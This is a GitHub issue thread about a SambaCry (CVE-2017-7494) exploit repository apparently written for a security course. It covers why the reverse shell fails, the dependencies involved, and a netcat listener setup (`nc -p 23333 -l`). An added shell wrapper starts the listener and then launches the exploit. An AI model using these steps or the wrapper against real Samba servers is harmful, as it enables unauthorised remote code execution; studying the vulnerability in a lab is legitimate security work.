I-Rinka / BIT-EternalBlue-for-macOS_Linux

Exploit for CVE-2017-7494 (SambaCry), written for a Net Security course final assignment. It demonstrates the risk of services that run with administrative privileges on Linux.
MIT License

Trying to load module exits 0 and with message 'Explpoit Finished. Can you see the reverse shell?' but no, I cannot. :) #1

Open pr0b3r7 opened 1 year ago

pr0b3r7 commented 1 year ago

Hi @I-Rinka,

Bottom-line up front: 'Trying to load module exits 0 and with message 'Exploit Finished. Can you see the reverse shell?' but no, I cannot. :)'

Was hoping you could shed some light on the following scenario or if you have ever encountered it. From bottom to top:


Great profile and good job with this fork for CVE-2017-7494 a.k.a SambaCry a.k.a EternalRed.

Landed on your code from this link.

I-Rinka commented 1 year ago

The upload function seems to be correct. There are two possible reasons why it doesn't work. Can you check them? : )

  1. The Python dependency is not correct. I modified the `impacket` lib for the SMB3 connection. If Python is using the dependency in my repo, it works. But if it points to an existing dependency on your host, it can upload the module but cannot load the module.
  2. Whether you set up a `netcat` listening process before you run the Python exploit script, as my Python script does not give you the reverse shell interface. You should see the reverse shell from a separate listening process. For example, run `nc -p 23333 -l` first and then run the Python script to attach the shell to the `netcat` listening process. From your `tcpdump` execution sequence I guess that you might have set up the listening process AFTER the exploit script. Please try setting up the listening process in a separate terminal and then running the script again?
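The listener-ordering point above is easy to get wrong when several panes are open at once. The following wrapper is an added example written for this thread, not code from the repository or from either commenter: it starts `nc` in the foreground so the shell lands in the current terminal, and only fires the exploit once `ss -ltn` actually shows the port bound. The port number, the `./exploit.py` invocation and the sample `ss` output are constructed for illustration; GNU netcat flags (`nc -l -p PORT`) are assumed, so adjust for BSD/OpenBSD `nc`.

```shell
#!/bin/sh
# Added example (not from the repo or the issue thread): make sure the
# reverse-shell listener is bound BEFORE the exploit is launched.

# Constructed sample of `ss -ltn` output, used only to exercise the parser.
SAMPLE_SS_OUTPUT='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128        0.0.0.0:22          0.0.0.0:*
LISTEN 0      1          0.0.0.0:23333       0.0.0.0:*
LISTEN 0      128           [::]:22             [::]:*'

# ss_has_listener SS_TEXT PORT
# Exit 0 if SS_TEXT (the output of `ss -ltn`) contains a TCP listener on PORT.
# Takes the text as an argument so it can be checked against a captured sample.
ss_has_listener() {
    printf '%s\n' "$1" | awk -v port="$2" '
        $1 == "LISTEN" {
            n = split($4, a, ":")       # column 4 is local addr:port; port is the last field
            if (a[n] == port) found = 1
        }
        END { exit found ? 0 : 1 }'
}

# wait_for_listener PORT [SECONDS]
# Poll the live `ss -ltn` output until something listens on PORT (default 10 s).
wait_for_listener() {
    port="$1"; tries="${2:-10}"
    while [ "$tries" -gt 0 ]; do
        if ss_has_listener "$(ss -ltn 2>/dev/null)" "$port"; then
            return 0
        fi
        tries=$((tries - 1))
        sleep 1
    done
    return 1
}

# run_exploit_with_listener PORT CMD [ARGS...]
# Example: run_exploit_with_listener 23333 python3 ./exploit.py <target args>
# The exploit is launched from a background subshell only after the listener is
# bound; nc itself runs in the foreground so the shell attaches to this terminal.
run_exploit_with_listener() {
    port="$1"; shift
    (
        if wait_for_listener "$port" 10; then
            "$@"
        else
            echo "no listener on TCP/$port after 10 s; exploit not launched" >&2
        fi
    ) &
    exec nc -l -p "$port"   # GNU netcat flags assumed; OpenBSD nc uses: nc -l "$port"
}
```

If the exploit prints its "Exploit Finished" banner but the listener never gets a connection, the next thing to check is a packet capture on the listener port from the attacker side, which separates "the module never executed" from "the callback is being blocked on the way back".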
pr0b3r7 commented 1 year ago

> The upload function seems to be correct. There are two possible reasons why it doesn't work. Can you check them? : )
>
> 1. The Python dependency is not correct. I modified the `impacket` lib for the SMB3 connection. If Python is using the dependency in my repo, it works. But if it points to an existing dependency on your host, it can upload the module but cannot load the module.

--> Made sure to delete impacket and crackmapexec since they had dependencies that did not allow your script to install impacket from your repo. After that it installed correctly.

> 2. Whether you set up a `netcat` listening process before you run the Python exploit script, as my Python script does not give you the reverse shell interface. You should see the reverse shell from a separate listening process. For example, run `nc -p 23333 -l` first and then run the Python script to attach the shell to the `netcat` listening process. From your `tcpdump` execution sequence I guess that you might have set up the listening process AFTER the exploit script. Please try setting up the listening process in a separate terminal and then running the script again?

--> The confusion here is my fault. I've been using tmux (terminal multiplexer) to open several windows at once. I've added a new screenshot in which I was running the exploit in a loop with no luck getting the RCE. Added another listener on 23333/TCP with no luck. Packet capture on that port does not show any traffic either. The shared library module would load correctly to the share at /home/Public/*.so but no reverse shell on 7777/TCP nor any traffic in from that port on the interface.

Thank you for the reply. Responses inline above. If you have any other suggestions, please let me know. Thank you.
